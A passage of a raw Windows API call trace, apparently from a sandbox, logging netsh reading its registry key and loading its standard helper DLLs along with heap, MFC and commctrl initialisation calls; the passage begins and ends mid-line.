0x2b30000 [0293.301] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0293.301] GetProcessHeap () returned 0x2b30000 [0293.302] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b384d0 [0293.302] GetProcessHeap () returned 0x2b30000 [0293.302] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0293.302] GetProcessHeap () returned 0x2b30000 [0293.302] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x90) returned 0x2b304a0 [0293.302] GetProcessHeap () returned 0x2b30000 [0293.302] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b384d0) returned 1 [0293.302] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x76c90000 [0293.310] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x397994 | out: phkResult=0x397994*=0x108) returned 0x0 [0293.311] RegQueryInfoKeyW (in: hKey=0x108, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x397990, lpcbMaxValueNameLen=0x397988, lpcbMaxValueLen=0x39798c, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x397990*=0x11, lpcbMaxValueNameLen=0x397988, lpcbMaxValueLen=0x39798c, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0293.311] GetProcessHeap () returned 0x2b30000 [0293.311] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x8, Size=0x16) returned 0x2b34990 [0293.311] GetProcessHeap () returned 0x2b30000 [0293.311] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x8, Size=0x23) returned 0x2b349b0 [0293.311] RegEnumValueW (in: hKey=0x108, dwIndex=0x0, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="2", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0293.312] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0293.312] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0293.312] GetProcessHeap () returned 0x2b30000 [0293.312] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x28) returned 0x2b33940 [0293.312] GetProcessHeap () returned 0x2b30000 [0293.312] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x4) returned 0x2b3db38 [0293.312] GetProcessHeap () returned 0x2b30000 [0293.312] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x14) returned 0x2b3df48 [0293.313] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0293.313] GetProcessHeap () returned 0x2b30000 [0293.313] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b34c50) returned 1 [0293.313] LoadLibraryExW (lpLibFileName="IFMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x6fdf0000 [0294.385] GetProcAddress (hModule=0x6fdf0000, lpProcName="InitHelperDll") returned 0x6fdf1d30 [0294.385] InitHelperDll () returned 0x0 [0294.831] RegisterHelper () returned 0x0 [0294.831] GetProcessHeap () returned 0x2b30000 [0294.831] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xd8) returned 0x2b44b68 [0294.831] GetProcessHeap () returned 0x2b30000 [0294.831] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b304a0) returned 1 [0299.572] RegEnumValueW (in: hKey=0x108, dwIndex=0x1, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="4", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0299.572] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0299.573] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0299.573] GetProcessHeap () returned 0x2b30000 [0299.573] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x3c) returned 0x2b340f0 [0299.573] GetProcessHeap () returned 0x2b30000 [0299.573] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x4) returned 0x2b3da38 [0299.573] GetProcessHeap () returned 0x2b30000 [0299.573] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1a) returned 0x2b42ce0 [0299.573] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0299.573] GetProcessHeap () returned 0x2b30000 [0299.573] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b33940) returned 1 [0299.573] LoadLibraryExW (lpLibFileName="RASMONTR.DLL", hFile=0x0, dwFlags=0x0) returned 0x6fd20000 [0302.769] LoadLibraryExA (lpLibFileName="MSVCRT.DLL", hFile=0x0, dwFlags=0x800) returned 0x74f40000 [0302.770] GetVersion () returned 0x3ad7000a [0302.770] SetErrorMode (uMode=0x0) returned 0x0 [0302.770] SetErrorMode (uMode=0x8001) returned 0x0 [0302.770] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x2b48c80 [0302.771] LocalFree (hMem=0x2b48c80) returned 0x0 [0302.771] GetVersion () returned 0x3ad7000a [0302.862] GlobalLock (hMem=0x890004) returned 0x2b48c80 [0302.863] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x2b48d90 [0302.863] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x2b46240 [0302.863] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x2b3da98 [0302.864] malloc (_Size=0x80) returned 0x2a510a0 [0302.864] __dllonexit () returned 0x6fc1e510 [0302.865] __dllonexit () returned 0x6fc1e4e0 [0302.865] __dllonexit () returned 0x6fc1e4f0 [0302.865] __dllonexit () returned 0x6fc1e500 [0302.868] __dllonexit () returned 0x6fc02bd0 [0302.869] __dllonexit () returned 0x6fc02bc0 [0302.869] __dllonexit () returned 0x6fc02c00 [0302.869] __dllonexit () returned 0x6fc02c40 [0302.870] __dllonexit () returned 0x6fc02d10 [0302.870] __dllonexit () returned 0x6fc02d20 [0302.870] __dllonexit () returned 0x6fc02d70 [0302.873] __dllonexit () returned 0x6fc02e20 [0302.873] __dllonexit () returned 0x6fc02c60 [0302.873] __dllonexit () returned 0x6fc1e560 [0302.874] __dllonexit () returned 0x6fc02c80 [0302.874] __dllonexit () returned 0x6fc02dd0 [0302.874] __dllonexit () returned 0x6fc02df0 [0302.874] __dllonexit () returned 0x6fc02e40 [0302.875] __dllonexit () returned 0x6fc02e80 [0302.875] __dllonexit () returned 0x6fc02e70 [0302.875] __dllonexit () returned 0x6fc02ea0 [0302.875] __dllonexit () returned 0x6fc02ec0 [0302.876] __dllonexit () returned 0x6fc02ef0 [0302.876] __dllonexit () returned 0x6fc02f70 [0302.876] __dllonexit () returned 0x6fc02ae0 [0302.876] __dllonexit () returned 0x6fc02af0 [0302.877] __dllonexit () returned 0x6fc02ad0 [0302.882] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc1a7 [0302.883] __dllonexit () returned 0x6fc1e540 [0302.883] __dllonexit () returned 0x6fc1e520 [0302.884] __dllonexit () returned 0x6fc1e550 [0302.884] __dllonexit () returned 0x6fc1e530 [0302.884] GetVersion () returned 0x3ad7000a [0302.884] GetVersion () returned 0x3ad7000a [0302.884] GetVersion () returned 0x3ad7000a [0302.885] __dllonexit () returned 0x6fc13c70 [0302.885] __dllonexit () returned 0x6fc13c90 [0302.886] __dllonexit () returned 0x6fc02ca0 [0302.886] __dllonexit () returned 0x6fc02d30 [0302.886] __dllonexit () returned 0x6fc02d40 [0302.887] __dllonexit () returned 0x6fc13ae0 [0302.888] GetVersion () returned 0x3ad7000a [0302.888] GetProcessVersion (ProcessId=0x0) returned 0xa0000 [0302.888] GetSystemMetrics (nIndex=11) returned 32 [0302.889] GetSystemMetrics (nIndex=12) returned 32 [0302.889] GetSystemMetrics (nIndex=2) returned 17 [0302.889] GetSystemMetrics (nIndex=3) returned 17 [0302.889] GetDC (hWnd=0x0) returned 0x60100ce [0302.889] GetDeviceCaps (hdc=0x60100ce, index=88) returned 96 [0302.889] GetDeviceCaps (hdc=0x60100ce, index=90) returned 96 [0302.889] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0302.890] GetSysColor (nIndex=15) returned 0xf0f0f0 [0302.890] GetSysColor (nIndex=16) returned 0xa0a0a0 [0302.890] GetSysColor (nIndex=20) returned 0xffffff [0302.890] GetSysColor (nIndex=18) returned 0x0 [0302.890] GetSysColor (nIndex=6) returned 0x646464 [0302.890] GetSysColorBrush (nIndex=15) returned 0x100072 [0302.890] GetSysColorBrush (nIndex=6) returned 0x10007a [0302.890] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0302.891] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0302.891] __dllonexit () returned 0x6fc02da0 [0302.891] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc1a8 [0302.891] __dllonexit () returned 0x6fc13ad0 [0302.892] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0302.892] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0302.892] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0302.892] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0302.892] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0302.892] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0302.892] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0302.892] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0302.892] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0302.893] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0302.893] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc07a [0302.893] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc083 [0302.893] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc1a8 [0302.894] __dllonexit () returned 0x6fc1e570 [0302.894] __dllonexit () returned 0x6fc1e590 [0302.895] __dllonexit () returned 0x6fc1e5a0 [0302.896] __dllonexit () returned 0x6fc1e5b0 [0302.896] __dllonexit () returned 0x6fc1e5c0 [0302.897] GetCursorPos (in: lpPoint=0x6fcea298 | out: lpPoint=0x6fcea298*(x=787, y=234)) returned 1 [0302.897] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x2b48f10 [0302.898] LocalReAlloc (hMem=0x2b3da98, uBytes=0xc, uFlags=0x2) returned 0x2b487d8 [0302.898] GetCurrentThread () returned 0xfffffffe [0302.898] GetCurrentThreadId () returned 0xea8 [0302.898] __dllonexit () returned 0x6fc02f80 [0302.899] SetErrorMode (uMode=0x0) returned 0x8001 [0302.899] SetErrorMode (uMode=0x8001) returned 0x0 [0302.899] GetModuleFileNameW (in: hModule=0x6fbe0000, lpFilename=0x397188, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\System32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0302.899] wcscpy_s (in: _Destination=0x396f80, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0302.900] FindResourceW (hModule=0x6fbe0000, lpName=0xe01, lpType=0x6) returned 0x3f0bb0 [0302.988] LoadStringW (in: hInstance=0x6fbe0000, uID=0xe000, lpBuffer=0x396d80, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0302.989] wcscpy_s (in: _Destination=0x3971bc, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0302.989] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0302.994] malloc (_Size=0x40) returned 0x2a53938 [0302.994] LocalAlloc (uFlags=0x40, uBytes=0x2090) returned 0x2b48fa0 [0302.995] GetSystemDirectoryA (in: lpBuffer=0x3973d4, uSize=0x112 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0302.995] strcat_s (in: _Destination="C:\\WINDOWS\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\WINDOWS\\system32\\MFC42") returned 0x0 [0302.995] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC") returned 0x0 [0302.995] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC.DLL") returned 0x0 [0302.995] LoadLibraryExA (lpLibFileName="C:\\WINDOWS\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0303.007] GetProcAddress (hModule=0x6fd20000, lpProcName="InitHelperDll") returned 0x6fd44150 [0303.007] InitHelperDll () returned 0x0 [0303.009] RegisterHelper () returned 0x0 [0303.009] GetProcessHeap () returned 0x2b30000 [0303.009] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x120) returned 0x2b45d70 [0303.009] GetProcessHeap () returned 0x2b30000 [0303.009] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b44b68) returned 1 [0303.009] RegisterHelper () returned 0x0 [0303.009] GetProcessHeap () returned 0x2b30000 [0303.009] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x168) returned 0x2b467a8 [0303.009] GetProcessHeap () returned 0x2b30000 [0303.009] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b45d70) returned 1 [0303.014] RegisterHelper () returned 0x0 [0303.014] GetProcessHeap () returned 0x2b30000 [0303.014] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1b0) returned 0x2b45d70 [0303.014] GetProcessHeap () returned 0x2b30000 [0303.014] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b467a8) returned 1 [0303.014] RegisterHelper () returned 0x0 [0303.014] GetProcessHeap () returned 0x2b30000 [0303.014] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1f8) returned 0x2b467a8 [0303.015] GetProcessHeap () returned 0x2b30000 [0303.015] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b45d70) returned 1 [0303.015] RegisterHelper () returned 0x0 [0303.015] GetProcessHeap () returned 0x2b30000 [0303.015] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x240) returned 0x2b4b038 [0303.015] GetProcessHeap () returned 0x2b30000 [0303.015] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b467a8) returned 1 [0303.015] RegEnumValueW (in: hKey=0x108, dwIndex=0x2, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="authfwcfg", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0303.015] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0303.015] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0303.015] GetProcessHeap () returned 0x2b30000 [0303.016] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x50) returned 0x2b44d08 [0303.016] GetProcessHeap () returned 0x2b30000 [0303.016] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x14) returned 0x2b3e048 [0303.016] GetProcessHeap () returned 0x2b30000 [0303.016] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1c) returned 0x2b42b78 [0303.016] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0303.016] GetProcessHeap () returned 0x2b30000 [0303.016] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b340f0) returned 1 [0303.016] LoadLibraryExW (lpLibFileName="AUTHFWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6fb80000 [0304.364] GetProcAddress (hModule=0x6fb80000, lpProcName="InitHelperDll") returned 0x6fb83d00 [0304.364] InitHelperDll () returned 0x0 [0304.374] RegisterHelper () returned 0x0 [0304.374] GetProcessHeap () returned 0x2b30000 [0304.374] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x288) returned 0x2b4de98 [0304.374] GetProcessHeap () returned 0x2b30000 [0304.374] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4b038) returned 1 [0304.374] RegisterHelper () returned 0x0 [0304.374] GetProcessHeap () returned 0x2b30000 [0304.374] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x2d0) returned 0x2b4e128 [0304.374] GetProcessHeap () returned 0x2b30000 [0304.375] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4de98) returned 1 [0304.375] RegisterHelper () returned 0x0 [0304.375] GetProcessHeap () returned 0x2b30000 [0304.375] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x318) returned 0x2b4e400 [0304.375] GetProcessHeap () returned 0x2b30000 [0304.375] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4e128) returned 1 [0304.375] RegisterHelper () returned 0x0 [0304.375] GetProcessHeap () returned 0x2b30000 [0304.375] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x360) returned 0x2b4de98 [0304.376] GetProcessHeap () returned 0x2b30000 [0304.376] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4e400) returned 1 [0304.376] RegisterHelper () returned 0x0 [0304.376] GetProcessHeap () returned 0x2b30000 [0304.376] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x3a8) returned 0x2b4e200 [0304.376] GetProcessHeap () returned 0x2b30000 [0304.376] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4de98) returned 1 [0304.376] RegEnumValueW (in: hKey=0x108, dwIndex=0x3, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="dhcpclient", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0304.377] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0304.377] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0304.377] GetProcessHeap () returned 0x2b30000 [0304.377] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x64) returned 0x2b46108 [0304.377] GetProcessHeap () returned 0x2b30000 [0304.377] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x16) returned 0x2b3dec8 [0304.377] GetProcessHeap () returned 0x2b30000 [0304.377] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x22) returned 0x2b3fde0 [0304.377] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0304.377] GetProcessHeap () returned 0x2b30000 [0304.377] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b44d08) returned 1 [0304.378] LoadLibraryExW (lpLibFileName="DHCPCMONITOR.DLL", hFile=0x0, dwFlags=0x0) returned 0x6fab0000 [0304.508] GetProcAddress (hModule=0x6fab0000, lpProcName="InitHelperDll") returned 0x6fab1a70 [0304.509] InitHelperDll () returned 0x0 [0304.509] RegisterHelper () returned 0x0 [0304.509] GetProcessHeap () returned 0x2b30000 [0304.509] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x3f0) returned 0x2b50dc0 [0304.509] GetProcessHeap () returned 0x2b30000 [0304.509] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4e200) returned 1 [0304.509] RegEnumValueW (in: hKey=0x108, dwIndex=0x4, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="dot3cfg", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0304.509] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0304.509] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0304.509] GetProcessHeap () returned 0x2b30000 [0304.509] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x78) returned 0x2b47e60 [0304.510] GetProcessHeap () returned 0x2b30000 [0304.510] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b4dc70 [0304.510] GetProcessHeap () returned 0x2b30000 [0304.510] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x18) returned 0x2b3de48 [0304.510] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0304.510] GetProcessHeap () returned 0x2b30000 [0304.510] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b46108) returned 1 [0304.510] LoadLibraryExW (lpLibFileName="DOT3CFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6fa90000 [0305.450] GetProcAddress (hModule=0x6fa90000, lpProcName="InitHelperDll") returned 0x6fa93ae0 [0305.450] InitHelperDll () returned 0x0 [0305.450] RegisterHelper () returned 0x0 [0305.450] GetProcessHeap () returned 0x2b30000 [0305.450] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x438) returned 0x2b4e120 [0305.450] GetProcessHeap () returned 0x2b30000 [0305.450] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b50dc0) returned 1 [0305.450] RegEnumValueW (in: hKey=0x108, dwIndex=0x5, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="fwcfg", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0305.450] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0305.451] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0305.451] GetProcessHeap () returned 0x2b30000 [0305.451] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8c) returned 0x2b304a0 [0305.451] GetProcessHeap () returned 0x2b30000 [0305.451] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b4db50 [0305.451] GetProcessHeap () returned 0x2b30000 [0305.451] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x14) returned 0x2b3df28 [0305.451] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0305.451] GetProcessHeap () returned 0x2b30000 [0305.451] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b47e60) returned 1 [0305.451] LoadLibraryExW (lpLibFileName="FWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6f9a0000 [0305.651] GetProcAddress (hModule=0x6f9a0000, lpProcName="InitHelperDll") returned 0x6f9a22e0 [0305.651] InitHelperDll () returned 0x0 [0305.651] RegisterHelper () returned 0x0 [0305.651] GetProcessHeap () returned 0x2b30000 [0305.652] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x480) returned 0x2b50dc0 [0305.652] GetProcessHeap () returned 0x2b30000 [0305.652] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b4e120) returned 1 [0305.652] RegEnumValueW (in: hKey=0x108, dwIndex=0x6, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="hnetmon", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0305.652] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0305.652] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0305.652] GetProcessHeap () returned 0x2b30000 [0305.652] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa0) returned 0x2b47ae8 [0305.652] GetProcessHeap () returned 0x2b30000 [0305.652] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b4dc28 [0305.653] GetProcessHeap () returned 0x2b30000 [0305.653] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x18) returned 0x2b3dde8 [0305.653] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0305.653] GetProcessHeap () returned 0x2b30000 [0305.653] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b304a0) returned 1 [0305.653] LoadLibraryExW (lpLibFileName="HNETMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x6f990000 [0307.400] GetProcAddress (hModule=0x6f990000, lpProcName="InitHelperDll") returned 0x6f9924a0 [0307.400] InitHelperDll () returned 0x0 [0307.400] RegisterHelper () returned 0x0 [0307.400] GetProcessHeap () returned 0x2b30000 [0307.400] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x4c8) returned 0x2b54aa8 [0307.401] GetProcessHeap () returned 0x2b30000 [0307.401] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b50dc0) returned 1 [0307.401] RegEnumValueW (in: hKey=0x108, dwIndex=0x7, lpValueName=0x2b34990, lpcchValueName=0x397980, lpReserved=0x0, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984 | out: lpValueName="netiohlp", lpcchValueName=0x397980, lpType=0x0, lpData=0x2b349b0, lpcbData=0x397984) returned 0x0 [0307.401] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0307.401] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0307.401] GetProcessHeap () returned 0x2b30000 [0307.401] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xb4) returned 0x2b471d8 [0307.401] GetProcessHeap () returned 0x2b30000 [0307.401] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b3df08 [0307.401] GetProcessHeap () returned 0x2b30000 [0307.402] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1a) returned 0x2b42b50 [0307.402] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0307.402] GetProcessHeap () returned 0x2b30000 [0307.402] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b47ae8) returned 1 [0307.402] LoadLibraryExW (lpLibFileName="NETIOHLP.DLL", hFile=0x0, dwFlags=0x0) returned 0x6f6b0000 [0307.955] GetProcAddress (hModule=0x6f6b0000, lpProcName="InitHelperDll") returned 0x6f6c6c00 [0307.956] InitHelperDll () returned 0x0 [0307.956] RegisterHelper () returned 0x0 [0307.956] GetProcessHeap () returned 0x2b30000 [0307.956] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x510) returned 0x2b56f88 [0307.956] GetProcessHeap () returned 0x2b30000 [0307.957] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b54aa8) returned 1 [0307.957] RegisterHelper () returned 0x0 [0307.957] GetProcessHeap () returned 0x2b30000 [0307.957] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x558) returned 0x2b574a0 [0307.957] GetProcessHeap () returned 0x2b30000 [0307.957] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b56f88) returned 1 [0307.957] RegisterHelper () returned 0x0 [0307.957] GetProcessHeap () returned 0x2b30000 [0307.957] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x5a0) returned 0x2b57a00 [0307.957] GetProcessHeap () returned 0x2b30000 [0307.957] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b574a0) returned 1 [0307.958] RegisterHelper () returned 0x0 [0307.958] GetProcessHeap () returned 0x2b30000 [0307.958] RtlAllocateHeap (HeapHandle=0x2b30000, 